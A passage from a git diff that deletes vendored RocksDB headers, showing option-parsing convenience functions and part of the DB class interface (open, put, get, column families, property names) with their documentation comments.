-// ColumnFamilyOptions "new_options".
-//
-// Below are the instructions of how to config some non-primitive-typed
-// options in ColumnFOptions:
-//
-// * table_factory:
-//   table_factory can be configured using our custom nested-option syntax.
-//
-//   {option_a=value_a; option_b=value_b; option_c=value_c; ... }
-//
-//   A nested option is enclosed by two curly braces, within which there are
-//   multiple option assignments.  Each assignment is of the form
-//   "variable_name=value;".
-//
-//   Currently we support the following types of TableFactory:
-//   - BlockBasedTableFactory:
-//     Use name "block_based_table_factory" to initialize table_factory with
-//     BlockBasedTableFactory.  Its BlockBasedTableFactoryOptions can be
-//     configured using the nested-option syntax.
-//     [Example]:
-//     * {"block_based_table_factory", "{block_cache=1M;block_size=4k;}"}
-//       is equivalent to assigning table_factory with a BlockBasedTableFactory
-//       that has 1M LRU block-cache with block size equals to 4k:
-//         ColumnFamilyOptions cf_opt;
-//         BlockBasedTableOptions blk_opt;
-//         blk_opt.block_cache = NewLRUCache(1 * 1024 * 1024);
-//         blk_opt.block_size = 4 * 1024;
-//         cf_opt.table_factory.reset(NewBlockBasedTableFactory(blk_opt));
-//   - PlainTableFactory:
-//     Use name "plain_table_factory" to initialize table_factory with
-//     PlainTableFactory.  Its PlainTableFactoryOptions can be configured using
-//     the nested-option syntax.
-//     [Example]:
-//     * {"plain_table_factory", "{user_key_len=66;bloom_bits_per_key=20;}"}
-//
-// * memtable_factory:
-//   Use "memtable" to config memtable_factory.  Here are the supported
-//   memtable factories:
-//   - SkipList:
-//     Pass "skip_list:<lookahead>" to config memtable to use SkipList,
-//     or simply "skip_list" to use the default SkipList.
-//     [Example]:
-//     * {"memtable", "skip_list:5"} is equivalent to setting
-//       memtable to SkipListFactory(5).
-//   - PrefixHash:
-//     Pass "prfix_hash:<hash_bucket_count>" to config memtable
-//     to use PrefixHash, or simply "prefix_hash" to use the default
-//     PrefixHash.
-//     [Example]:
-//     * {"memtable", "prefix_hash:1000"} is equivalent to setting
-//       memtable to NewHashSkipListRepFactory(hash_bucket_count).
-//   - HashLinkedList:
-//     Pass "hash_linkedlist:<hash_bucket_count>" to config memtable
-//     to use HashLinkedList, or simply "hash_linkedlist" to use the default
-//     HashLinkedList.
-//     [Example]:
-//     * {"memtable", "hash_linkedlist:1000"} is equivalent to
-//       setting memtable to NewHashLinkListRepFactory(1000).
-//   - VectorRepFactory:
-//     Pass "vector:<count>" to config memtable to use VectorRepFactory,
-//     or simply "vector" to use the default Vector memtable.
-//     [Example]:
-//     * {"memtable", "vector:1024"} is equivalent to setting memtable
-//       to VectorRepFactory(1024).
-//   - HashCuckooRepFactory:
-//     Pass "cuckoo:<write_buffer_size>" to use HashCuckooRepFactory with the
-//     specified write buffer size, or simply "cuckoo" to use the default
-//     HashCuckooRepFactory.
-//     [Example]:
-//     * {"memtable", "cuckoo:1024"} is equivalent to setting memtable
-//       to NewHashCuckooRepFactory(1024).
-//
-//  * compression_opts:
-//    Use "compression_opts" to config compression_opts.  The value format
-//    is of the form "<window_bits>:<level>:<strategy>:<max_dict_bytes>".
-//    [Example]:
-//    * {"compression_opts", "4:5:6:7"} is equivalent to setting:
-//        ColumnFamilyOptions cf_opt;
-//        cf_opt.compression_opts.window_bits = 4;
-//        cf_opt.compression_opts.level = 5;
-//        cf_opt.compression_opts.strategy = 6;
-//        cf_opt.compression_opts.max_dict_bytes = 7;
-//
-// @param base_options the default options of the output "new_options".
-// @param opts_map an option name to value map for specifying how "new_options"
-//     should be set.
-// @param new_options the resulting options based on "base_options" with the
-//     change specified in "opts_map".
-// @param input_strings_escaped when set to true, each escaped characters
-//     prefixed by '\' in the values of the opts_map will be further converted
-//     back to the raw string before assigning to the associated options.
-// @param ignore_unknown_options when set to true, unknown options are ignored
-//     instead of resulting in an unknown-option error.
-// @return Status::OK() on success.  Otherwise, a non-ok status indicating
-//     error will be returned, and "new_options" will be set to "base_options".
-Status GetColumnFamilyOptionsFromMap(
-    const ColumnFamilyOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    ColumnFamilyOptions* new_options, bool input_strings_escaped = false,
-    bool ignore_unknown_options = false);
-
-// Take a default DBOptions "base_options" in addition to a
-// map "opts_map" of option name to option value to construct the new
-// DBOptions "new_options".
-//
-// Below are the instructions of how to config some non-primitive-typed
-// options in DBOptions:
-//
-// * rate_limiter_bytes_per_sec:
-//   RateLimiter can be configured directly by specifying its bytes_per_sec.
-//   [Example]:
-//   - Passing {"rate_limiter_bytes_per_sec", "1024"} is equivalent to
-//     passing NewGenericRateLimiter(1024) to rate_limiter_bytes_per_sec.
-//
-// @param base_options the default options of the output "new_options".
-// @param opts_map an option name to value map for specifying how "new_options"
-//     should be set.
-// @param new_options the resulting options based on "base_options" with the
-//     change specified in "opts_map".
-// @param input_strings_escaped when set to true, each escaped characters
-//     prefixed by '\' in the values of the opts_map will be further converted
-//     back to the raw string before assigning to the associated options.
-// @param ignore_unknown_options when set to true, unknown options are ignored
-//     instead of resulting in an unknown-option error.
-// @return Status::OK() on success.  Otherwise, a non-ok status indicating
-//     error will be returned, and "new_options" will be set to "base_options".
-Status GetDBOptionsFromMap(
-    const DBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    DBOptions* new_options, bool input_strings_escaped = false,
-    bool ignore_unknown_options = false);
-
-// Take a default BlockBasedTableOptions "table_options" in addition to a
-// map "opts_map" of option name to option value to construct the new
-// BlockBasedTableOptions "new_table_options".
-//
-// Below are the instructions of how to config some non-primitive-typed
-// options in BlockBasedTableOptions:
-//
-// * filter_policy:
-//   We currently only support the following FilterPolicy in the convenience
-//   functions:
-//   - BloomFilter: use "bloomfilter:[bits_per_key]:[use_block_based_builder]"
-//     to specify BloomFilter.  The above string is equivalent to calling
-//     NewBloomFilterPolicy(bits_per_key, use_block_based_builder).
-//     [Example]:
-//     - Pass {"filter_policy", "bloomfilter:4:true"} in
-//       GetBlockBasedTableOptionsFromMap to use a BloomFilter with 4-bits
-//       per key and use_block_based_builder enabled.
-//
-// * block_cache / block_cache_compressed:
-//   We currently only support LRU cache in the GetOptions API.  The LRU
-//   cache can be set by directly specifying its size.
-//   [Example]:
-//   - Passing {"block_cache", "1M"} in GetBlockBasedTableOptionsFromMap is
-//     equivalent to setting block_cache using NewLRUCache(1024 * 1024).
-//
-// @param table_options the default options of the output "new_table_options".
-// @param opts_map an option name to value map for specifying how
-//     "new_table_options" should be set.
-// @param new_table_options the resulting options based on "table_options"
-//     with the change specified in "opts_map".
-// @param input_strings_escaped when set to true, each escaped characters
-//     prefixed by '\' in the values of the opts_map will be further converted
-//     back to the raw string before assigning to the associated options.
-// @param ignore_unknown_options when set to true, unknown options are ignored
-//     instead of resulting in an unknown-option error.
-// @return Status::OK() on success.  Otherwise, a non-ok status indicating
-//     error will be returned, and "new_table_options" will be set to
-//     "table_options".
-Status GetBlockBasedTableOptionsFromMap(
-    const BlockBasedTableOptions& table_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    BlockBasedTableOptions* new_table_options,
-    bool input_strings_escaped = false, bool ignore_unknown_options = false);
-
-// Take a default PlainTableOptions "table_options" in addition to a
-// map "opts_map" of option name to option value to construct the new
-// PlainTableOptions "new_table_options".
-//
-// @param table_options the default options of the output "new_table_options".
-// @param opts_map an option name to value map for specifying how
-//     "new_table_options" should be set.
-// @param new_table_options the resulting options based on "table_options"
-//     with the change specified in "opts_map".
-// @param input_strings_escaped when set to true, each escaped characters
-//     prefixed by '\' in the values of the opts_map will be further converted
-//     back to the raw string before assigning to the associated options.
-// @param ignore_unknown_options when set to true, unknown options are ignored
-//     instead of resulting in an unknown-option error.
-// @return Status::OK() on success.  Otherwise, a non-ok status indicating
-//     error will be returned, and "new_table_options" will be set to
-//     "table_options".
-Status GetPlainTableOptionsFromMap(
-    const PlainTableOptions& table_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    PlainTableOptions* new_table_options, bool input_strings_escaped = false,
-    bool ignore_unknown_options = false);
-
-// Take a string representation of option names and  values, apply them into the
-// base_options, and return the new options as a result. The string has the
-// following format:
-//   "write_buffer_size=1024;max_write_buffer_number=2"
-// Nested options config is also possible. For example, you can define
-// BlockBasedTableOptions as part of the string for block-based table factory:
-//   "write_buffer_size=1024;block_based_table_factory={block_size=4k};"
-//   "max_write_buffer_num=2"
-Status GetColumnFamilyOptionsFromString(
-    const ColumnFamilyOptions& base_options,
-    const std::string& opts_str,
-    ColumnFamilyOptions* new_options);
-
-Status GetDBOptionsFromString(
-    const DBOptions& base_options,
-    const std::string& opts_str,
-    DBOptions* new_options);
-
-Status GetStringFromDBOptions(std::string* opts_str,
-                              const DBOptions& db_options,
-                              const std::string& delimiter = ";  ");
-
-Status GetStringFromColumnFamilyOptions(std::string* opts_str,
-                                        const ColumnFamilyOptions& cf_options,
-                                        const std::string& delimiter = ";  ");
-
-Status GetStringFromCompressionType(std::string* compression_str,
-                                    CompressionType compression_type);
-
-std::vector<CompressionType> GetSupportedCompressions();
-
-Status GetBlockBasedTableOptionsFromString(
-    const BlockBasedTableOptions& table_options,
-    const std::string& opts_str,
-    BlockBasedTableOptions* new_table_options);
-
-Status GetPlainTableOptionsFromString(
-    const PlainTableOptions& table_options,
-    const std::string& opts_str,
-    PlainTableOptions* new_table_options);
-
-Status GetMemTableRepFactoryFromString(
-    const std::string& opts_str,
-    std::unique_ptr<MemTableRepFactory>* new_mem_factory);
-
-Status GetOptionsFromString(const Options& base_options,
-                            const std::string& opts_str, Options* new_options);
-
-Status StringToMap(const std::string& opts_str,
-                   std::unordered_map<std::string, std::string>* opts_map);
-
-// Request stopping background work, if wait is true wait until it's done
-void CancelAllBackgroundWork(DB* db, bool wait = false);
-
-// Delete files which are entirely in the given range
-// Could leave some keys in the range which are in files which are not
-// entirely in the range.
-// Snapshots before the delete might not see the data in the given range.
-Status DeleteFilesInRange(DB* db, ColumnFamilyHandle* column_family,
-                          const Slice* begin, const Slice* end);
-
-// Verify the checksum of file
-Status VerifySstFileChecksum(const Options& options,
-                             const EnvOptions& env_options,
-                             const std::string& file_path);
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/db.h b/thirdparty/rocksdb/include/rocksdb/db.h
deleted file mode 100644
index 964f7b1..0000000
--- a/thirdparty/rocksdb/include/rocksdb/db.h
+++ /dev/null
@@ -1,1162 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_DB_H_
-#define STORAGE_ROCKSDB_INCLUDE_DB_H_
-
-#include <stdint.h>
-#include <stdio.h>
-#include <map>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "rocksdb/iterator.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/metadata.h"
-#include "rocksdb/options.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/sst_file_writer.h"
-#include "rocksdb/thread_status.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/types.h"
-#include "rocksdb/version.h"
-
-#ifdef _WIN32
-// Windows API macro interference
-#undef DeleteFile
-#endif
-
-#if defined(__GNUC__) || defined(__clang__)
-#define ROCKSDB_DEPRECATED_FUNC __attribute__((__deprecated__))
-#elif _WIN32
-#define ROCKSDB_DEPRECATED_FUNC __declspec(deprecated)
-#endif
-
-namespace rocksdb {
-
-struct Options;
-struct DBOptions;
-struct ColumnFamilyOptions;
-struct ReadOptions;
-struct WriteOptions;
-struct FlushOptions;
-struct CompactionOptions;
-struct CompactRangeOptions;
-struct TableProperties;
-struct ExternalSstFileInfo;
-class WriteBatch;
-class Env;
-class EventListener;
-
-using std::unique_ptr;
-
-extern const std::string kDefaultColumnFamilyName;
-struct ColumnFamilyDescriptor {
-  std::string name;
-  ColumnFamilyOptions options;
-  ColumnFamilyDescriptor()
-      : name(kDefaultColumnFamilyName), options(ColumnFamilyOptions()) {}
-  ColumnFamilyDescriptor(const std::string& _name,
-                         const ColumnFamilyOptions& _options)
-      : name(_name), options(_options) {}
-};
-
-class ColumnFamilyHandle {
- public:
-  virtual ~ColumnFamilyHandle() {}
-  // Returns the name of the column family associated with the current handle.
-  virtual const std::string& GetName() const = 0;
-  // Returns the ID of the column family associated with the current handle.
-  virtual uint32_t GetID() const = 0;
-  // Fills "*desc" with the up-to-date descriptor of the column family
-  // associated with this handle. Since it fills "*desc" with the up-to-date
-  // information, this call might internally lock and release DB mutex to
-  // access the up-to-date CF options.  In addition, all the pointer-typed
-  // options cannot be referenced any longer than the original options exist.
-  //
-  // Note that this function is not supported in RocksDBLite.
-  virtual Status GetDescriptor(ColumnFamilyDescriptor* desc) = 0;
-  // Returns the comparator of the column family associated with the
-  // current handle.
-  virtual const Comparator* GetComparator() const = 0;
-};
-
-static const int kMajorVersion = __ROCKSDB_MAJOR__;
-static const int kMinorVersion = __ROCKSDB_MINOR__;
-
-// A range of keys
-struct Range {
-  Slice start;          // Included in the range
-  Slice limit;          // Not included in the range
-
-  Range() { }
-  Range(const Slice& s, const Slice& l) : start(s), limit(l) { }
-};
-
-// A collections of table properties objects, where
-//  key: is the table's file name.
-//  value: the table properties object of the given table.
-typedef std::unordered_map<std::string, std::shared_ptr<const TableProperties>>
-    TablePropertiesCollection;
-
-// A DB is a persistent ordered map from keys to values.
-// A DB is safe for concurrent access from multiple threads without
-// any external synchronization.
-class DB {
- public:
-  // Open the database with the specified "name".
-  // Stores a pointer to a heap-allocated database in *dbptr and returns
-  // OK on success.
-  // Stores nullptr in *dbptr and returns a non-OK status on error.
-  // Caller should delete *dbptr when it is no longer needed.
-  static Status Open(const Options& options,
-                     const std::string& name,
-                     DB** dbptr);
-
-  // Open the database for read only. All DB interfaces
-  // that modify data, like put/delete, will return error.
-  // If the db is opened in read only mode, then no compactions
-  // will happen.
-  //
-  // Not supported in ROCKSDB_LITE, in which case the function will
-  // return Status::NotSupported.
-  static Status OpenForReadOnly(const Options& options,
-      const std::string& name, DB** dbptr,
-      bool error_if_log_file_exist = false);
-
-  // Open the database for read only with column families. When opening DB with
-  // read only, you can specify only a subset of column families in the
-  // database that should be opened. However, you always need to specify default
-  // column family. The default column family name is 'default' and it's stored
-  // in rocksdb::kDefaultColumnFamilyName
-  //
-  // Not supported in ROCKSDB_LITE, in which case the function will
-  // return Status::NotSupported.
-  static Status OpenForReadOnly(
-      const DBOptions& db_options, const std::string& name,
-      const std::vector<ColumnFamilyDescriptor>& column_families,
-      std::vector<ColumnFamilyHandle*>* handles, DB** dbptr,
-      bool error_if_log_file_exist = false);
-
-  // Open DB with column families.
-  // db_options specify database specific options
-  // column_families is the vector of all column families in the database,
-  // containing column family name and options. You need to open ALL column
-  // families in the database. To get the list of column families, you can use
-  // ListColumnFamilies(). Also, you can open only a subset of column families
-  // for read-only access.
-  // The default column family name is 'default' and it's stored
-  // in rocksdb::kDefaultColumnFamilyName.
-  // If everything is OK, handles will on return be the same size
-  // as column_families --- handles[i] will be a handle that you
-  // will use to operate on column family column_family[i].
-  // Before delete DB, you have to close All column families by calling
-  // DestroyColumnFamilyHandle() with all the handles.
-  static Status Open(const DBOptions& db_options, const std::string& name,
-                     const std::vector<ColumnFamilyDescriptor>& column_families,
-                     std::vector<ColumnFamilyHandle*>* handles, DB** dbptr);
-
-  // ListColumnFamilies will open the DB specified by argument name
-  // and return the list of all column families in that DB
-  // through column_families argument. The ordering of
-  // column families in column_families is unspecified.
-  static Status ListColumnFamilies(const DBOptions& db_options,
-                                   const std::string& name,
-                                   std::vector<std::string>* column_families);
-
-  DB() { }
-  virtual ~DB();
-
-  // Create a column_family and return the handle of column family
-  // through the argument handle.
-  virtual Status CreateColumnFamily(const ColumnFamilyOptions& options,
-                                    const std::string& column_family_name,
-                                    ColumnFamilyHandle** handle);
-
-  // Bulk create column families with the same column family options.
-  // Return the handles of the column families through the argument handles.
-  // In case of error, the request may succeed partially, and handles will
-  // contain column family handles that it managed to create, and have size
-  // equal to the number of created column families.
-  virtual Status CreateColumnFamilies(
-      const ColumnFamilyOptions& options,
-      const std::vector<std::string>& column_family_names,
-      std::vector<ColumnFamilyHandle*>* handles);
-
-  // Bulk create column families.
-  // Return the handles of the column families through the argument handles.
-  // In case of error, the request may succeed partially, and handles will
-  // contain column family handles that it managed to create, and have size
-  // equal to the number of created column families.
-  virtual Status CreateColumnFamilies(
-      const std::vector<ColumnFamilyDescriptor>& column_families,
-      std::vector<ColumnFamilyHandle*>* handles);
-
-  // Drop a column family specified by column_family handle. This call
-  // only records a drop record in the manifest and prevents the column
-  // family from flushing and compacting.
-  virtual Status DropColumnFamily(ColumnFamilyHandle* column_family);
-
-  // Bulk drop column families. This call only records drop records in the
-  // manifest and prevents the column families from flushing and compacting.
-  // In case of error, the request may succeed partially. User may call
-  // ListColumnFamilies to check the result.
-  virtual Status DropColumnFamilies(
-      const std::vector<ColumnFamilyHandle*>& column_families);
-
-  // Close a column family specified by column_family handle and destroy
-  // the column family handle specified to avoid double deletion. This call
-  // deletes the column family handle by default. Use this method to
-  // close column family instead of deleting column family handle directly
-  virtual Status DestroyColumnFamilyHandle(ColumnFamilyHandle* column_family);
-
-  // Set the database entry for "key" to "value".
-  // If "key" already exists, it will be overwritten.
-  // Returns OK on success, and a non-OK status on error.
-  // Note: consider setting options.sync = true.
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) = 0;
-  virtual Status Put(const WriteOptions& options, const Slice& key,
-                     const Slice& value) {
-    return Put(options, DefaultColumnFamily(), key, value);
-  }
-
-  // Remove the database entry (if any) for "key".  Returns OK on
-  // success, and a non-OK status on error.  It is not an error if "key"
-  // did not exist in the database.
-  // Note: consider setting options.sync = true.
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) = 0;
-  virtual Status Delete(const WriteOptions& options, const Slice& key) {
-    return Delete(options, DefaultColumnFamily(), key);
-  }
-
-  // Remove the database entry for "key". Requires that the key exists
-  // and was not overwritten. Returns OK on success, and a non-OK status
-  // on error.  It is not an error if "key" did not exist in the database.
-  //
-  // If a key is overwritten (by calling Put() multiple times), then the result
-  // of calling SingleDelete() on this key is undefined.  SingleDelete() only
-  // behaves correctly if there has been only one Put() for this key since the
-  // previous call to SingleDelete() for this key.
-  //
-  // This feature is currently an experimental performance optimization
-  // for a very specific workload.  It is up to the caller to ensure that
-  // SingleDelete is only used for a key that is not deleted using Delete() or
-  // written using Merge().  Mixing SingleDelete operations with Deletes and
-  // Merges can result in undefined behavior.
-  //
-  // Note: consider setting options.sync = true.
-  virtual Status SingleDelete(const WriteOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key) = 0;
-  virtual Status SingleDelete(const WriteOptions& options, const Slice& key) {
-    return SingleDelete(options, DefaultColumnFamily(), key);
-  }
-
-  // Removes the database entries in the range ["begin_key", "end_key"), i.e.,
-  // including "begin_key" and excluding "end_key". Returns OK on success, and
-  // a non-OK status on error. It is not an error if no keys exist in the range
-  // ["begin_key", "end_key").
-  //
-  // This feature is currently an experimental performance optimization for
-  // deleting very large ranges of contiguous keys. Invoking it many times or on
-  // small ranges may severely degrade read performance; in particular, the
-  // resulting performance can be worse than calling Delete() for each key in
-  // the range. Note also the degraded read performance affects keys outside the
-  // deleted ranges, and affects database operations involving scans, like flush
-  // and compaction.
-  //
-  // Consider setting ReadOptions::ignore_range_deletions = true to speed
-  // up reads for key(s) that are known to be unaffected by range deletions.
-  virtual Status DeleteRange(const WriteOptions& options,
-                             ColumnFamilyHandle* column_family,
-                             const Slice& begin_key, const Slice& end_key);
-
-  // Merge the database entry for "key" with "value".  Returns OK on success,
-  // and a non-OK status on error. The semantics of this operation is
-  // determined by the user provided merge_operator when opening DB.
-  // Note: consider setting options.sync = true.
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) = 0;
-  virtual Status Merge(const WriteOptions& options, const Slice& key,
-                       const Slice& value) {
-    return Merge(options, DefaultColumnFamily(), key, value);
-  }
-
-  // Apply the specified updates to the database.
-  // If `updates` contains no update, WAL will still be synced if
-  // options.sync=true.
-  // Returns OK on success, non-OK on failure.
-  // Note: consider setting options.sync = true.
-  virtual Status Write(const WriteOptions& options, WriteBatch* updates) = 0;
-
-  // If the database contains an entry for "key" store the
-  // corresponding value in *value and return OK.
-  //
-  // If there is no entry for "key" leave *value unchanged and return
-  // a status for which Status::IsNotFound() returns true.
-  //
-  // May return some other Status on an error.
-  virtual inline Status Get(const ReadOptions& options,
-                            ColumnFamilyHandle* column_family, const Slice& key,
-                            std::string* value) {
-    assert(value != nullptr);
-    PinnableSlice pinnable_val(value);
-    assert(!pinnable_val.IsPinned());
-    auto s = Get(options, column_family, key, &pinnable_val);
-    if (s.ok() && pinnable_val.IsPinned()) {
-      value->assign(pinnable_val.data(), pinnable_val.size());
-    }  // else value is already assigned
-    return s;
-  }
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) = 0;
-  virtual Status Get(const ReadOptions& options, const Slice& key, std::string* value) {
-    return Get(options, DefaultColumnFamily(), key, value);
-  }
-
-  // If keys[i] does not exist in the database, then the i'th returned
-  // status will be one for which Status::IsNotFound() is true, and
-  // (*values)[i] will be set to some arbitrary value (often ""). Otherwise,
-  // the i'th returned status will have Status::ok() true, and (*values)[i]
-  // will store the value associated with keys[i].
-  //
-  // (*values) will always be resized to be the same size as (keys).
-  // Similarly, the number of returned statuses will be the number of keys.
-  // Note: keys will not be "de-duplicated". Duplicate keys will return
-  // duplicate values in order.
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys, std::vector<std::string>* values) = 0;
-  virtual std::vector<Status> MultiGet(const ReadOptions& options,
-                                       const std::vector<Slice>& keys,
-                                       std::vector<std::string>* values) {
-    return MultiGet(options, std::vector<ColumnFamilyHandle*>(
-                                 keys.size(), DefaultColumnFamily()),
-                    keys, values);
-  }
-
-  // If the key definitely does not exist in the database, then this method
-  // returns false, else true. If the caller wants to obtain value when the key
-  // is found in memory, a bool for 'value_found' must be passed. 'value_found'
-  // will be true on return if value has been set properly.
-  // This check is potentially lighter-weight than invoking DB::Get(). One way
-  // to make this lighter weight is to avoid doing any IOs.
-  // Default implementation here returns true and sets 'value_found' to false
-  virtual bool KeyMayExist(const ReadOptions& /*options*/,
-                           ColumnFamilyHandle* /*column_family*/,
-                           const Slice& /*key*/, std::string* /*value*/,
-                           bool* value_found = nullptr) {
-    if (value_found != nullptr) {
-      *value_found = false;
-    }
-    return true;
-  }
-  virtual bool KeyMayExist(const ReadOptions& options, const Slice& key,
-                           std::string* value, bool* value_found = nullptr) {
-    return KeyMayExist(options, DefaultColumnFamily(), key, value, value_found);
-  }
-
-  // Return a heap-allocated iterator over the contents of the database.
-  // The result of NewIterator() is initially invalid (caller must
-  // call one of the Seek methods on the iterator before using it).
-  //
-  // Caller should delete the iterator when it is no longer needed.
-  // The returned iterator should be deleted before this db is deleted.
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) = 0;
-  virtual Iterator* NewIterator(const ReadOptions& options) {
-    return NewIterator(options, DefaultColumnFamily());
-  }
-  // Returns iterators from a consistent database state across multiple
-  // column families. Iterators are heap allocated and need to be deleted
-  // before the db is deleted
-  virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      std::vector<Iterator*>* iterators) = 0;
-
-  // Return a handle to the current DB state.  Iterators created with
-  // this handle will all observe a stable snapshot of the current DB
-  // state.  The caller must call ReleaseSnapshot(result) when the
-  // snapshot is no longer needed.
-  //
-  // nullptr will be returned if the DB fails to take a snapshot or does
-  // not support snapshot.
-  virtual const Snapshot* GetSnapshot() = 0;
-
-  // Release a previously acquired snapshot.  The caller must not
-  // use "snapshot" after this call.
-  virtual void ReleaseSnapshot(const Snapshot* snapshot) = 0;
-
-#ifndef ROCKSDB_LITE
-  // Contains all valid property arguments for GetProperty().
-  //
-  // NOTE: Property names cannot end in numbers since those are interpreted as
-  //       arguments, e.g., see kNumFilesAtLevelPrefix.
-  struct Properties {
-    //  "rocksdb.num-files-at-level<N>" - returns string containing the number
-    //      of files at level <N>, where <N> is an ASCII representation of a
-    //      level number (e.g., "0").
-    static const std::string kNumFilesAtLevelPrefix;
-
-    //  "rocksdb.compression-ratio-at-level<N>" - returns string containing the
-    //      compression ratio of data at level <N>, where <N> is an ASCII
-    //      representation of a level number (e.g., "0"). Here, compression
-    //      ratio is defined as uncompressed data size / compressed file size.
-    //      Returns "-1.0" if no open files at level <N>.
-    static const std::string kCompressionRatioAtLevelPrefix;
-
-    //  "rocksdb.stats" - returns a multi-line string containing the data
-    //      described by kCFStats followed by the data described by kDBStats.
-    static const std::string kStats;
-
-    //  "rocksdb.sstables" - returns a multi-line string summarizing current
-    //      SST files.
-    static const std::string kSSTables;
-
-    //  "rocksdb.cfstats" - Both of "rocksdb.cfstats-no-file-histogram" and
-    //      "rocksdb.cf-file-histogram" together. See below for description
-    //      of the two.
-    static const std::string kCFStats;
-
-    //  "rocksdb.cfstats-no-file-histogram" - returns a multi-line string with
-    //      general columm family stats per-level over db's lifetime ("L<n>"),
-    //      aggregated over db's lifetime ("Sum"), and aggregated over the
-    //      interval since the last retrieval ("Int").
-    //  It could also be used to return the stats in the format of the map.
-    //  In this case there will a pair of string to array of double for
-    //  each level as well as for "Sum". "Int" stats will not be affected
-    //  when this form of stats are retrieved.
-    static const std::string kCFStatsNoFileHistogram;
-
-    //  "rocksdb.cf-file-histogram" - print out how many file reads to every
-    //      level, as well as the histogram of latency of single requests.
-    static const std::string kCFFileHistogram;
-
-    //  "rocksdb.dbstats" - returns a multi-line string with general database
-    //      stats, both cumulative (over the db's lifetime) and interval (since
-    //      the last retrieval of kDBStats).
-    static const std::string kDBStats;
-
-    //  "rocksdb.levelstats" - returns multi-line string containing the number
-    //      of files per level and total size of each level (MB).
-    static const std::string kLevelStats;
-
-    //  "rocksdb.num-immutable-mem-table" - returns number of immutable
-    //      memtables that have not yet been flushed.
-    static const std::string kNumImmutableMemTable;
-
-    //  "rocksdb.num-immutable-mem-table-flushed" - returns number of immutable
-    //      memtables that have already been flushed.
-    static const std::string kNumImmutableMemTableFlushed;
-
-    //  "rocksdb.mem-table-flush-pending" - returns 1 if a memtable flush is
-    //      pending; otherwise, returns 0.
-    static const std::string kMemTableFlushPending;
-
-    //  "rocksdb.num-running-flushes" - returns the number of currently running
-    //      flushes.
-    static const std::string kNumRunningFlushes;
-
-    //  "rocksdb.compaction-pending" - returns 1 if at least one compaction is
-    //      pending; otherwise, returns 0.
-    static const std::string kCompactionPending;
-
-    //  "rocksdb.num-running-compactions" - returns the number of currently
-    //      running compactions.
-    static const std::string kNumRunningCompactions;
-
-    //  "rocksdb.background-errors" - returns accumulated number of background
-    //      errors.
-    static const std::string kBackgroundErrors;
-
-    //  "rocksdb.cur-size-active-mem-table" - returns approximate size of active
-    //      memtable (bytes).
-    static const std::string kCurSizeActiveMemTable;
-
-    //  "rocksdb.cur-size-all-mem-tables" - returns approximate size of active
-    //      and unflushed immutable memtables (bytes).
-    static const std::string kCurSizeAllMemTables;
-
-    //  "rocksdb.size-all-mem-tables" - returns approximate size of active,
-    //      unflushed immutable, and pinned immutable memtables (bytes).
-    static const std::string kSizeAllMemTables;
-
-    //  "rocksdb.num-entries-active-mem-table" - returns total number of entries
-    //      in the active memtable.
-    static const std::string kNumEntriesActiveMemTable;
-
-    //  "rocksdb.num-entries-imm-mem-tables" - returns total number of entries
-    //      in the unflushed immutable memtables.
-    static const std::string kNumEntriesImmMemTables;
-
-    //  "rocksdb.num-deletes-active-mem-table" - returns total number of delete
-    //      entries in the active memtable.
-    static const std::string kNumDeletesActiveMemTable;
-
-    //  "rocksdb.num-deletes-imm-mem-tables" - returns total number of delete
-    //      entries in the unflushed immutable memtables.
-    static const std::string kNumDeletesImmMemTables;
-
-    //  "rocksdb.estimate-num-keys" - returns estimated number of total keys in
-    //      the active and unflushed immutable memtables and storage.
-    static const std::string kEstimateNumKeys;
-
-    //  "rocksdb.estimate-table-readers-mem" - returns estimated memory used for
-    //      reading SST tables, excluding memory used in block cache (e.g.,
-    //      filter and index blocks).
-    static const std::string kEstimateTableReadersMem;
-
-    //  "rocksdb.is-file-deletions-enabled" - returns 0 if deletion of obsolete
-    //      files is enabled; otherwise, returns a non-zero number.
-    static const std::string kIsFileDeletionsEnabled;
-
-    //  "rocksdb.num-snapshots" - returns number of unreleased snapshots of the
-    //      database.
-    static const std::string kNumSnapshots;
-
-    //  "rocksdb.oldest-snapshot-time" - returns number representing unix
-    //      timestamp of oldest unreleased snapshot.
-    static const std::string kOldestSnapshotTime;
-
-    //  "rocksdb.num-live-versions" - returns number of live versions. `Version`
-    //      is an internal data structure. See version_set.h for details. More
-    //      live versions often mean more SST files are held from being deleted,
-    //      by iterators or unfinished compactions.
-    static const std::string kNumLiveVersions;
-
-    //  "rocksdb.current-super-version-number" - returns number of current LSM
-    //  version. It is a uint64_t integer number, incremented after there is
-    //  any change to the LSM tree. The number is not preserved after restarting
-    //  the DB. After DB restart, it will start from 0 again.
-    static const std::string kCurrentSuperVersionNumber;
-
-    //  "rocksdb.estimate-live-data-size" - returns an estimate of the amount of
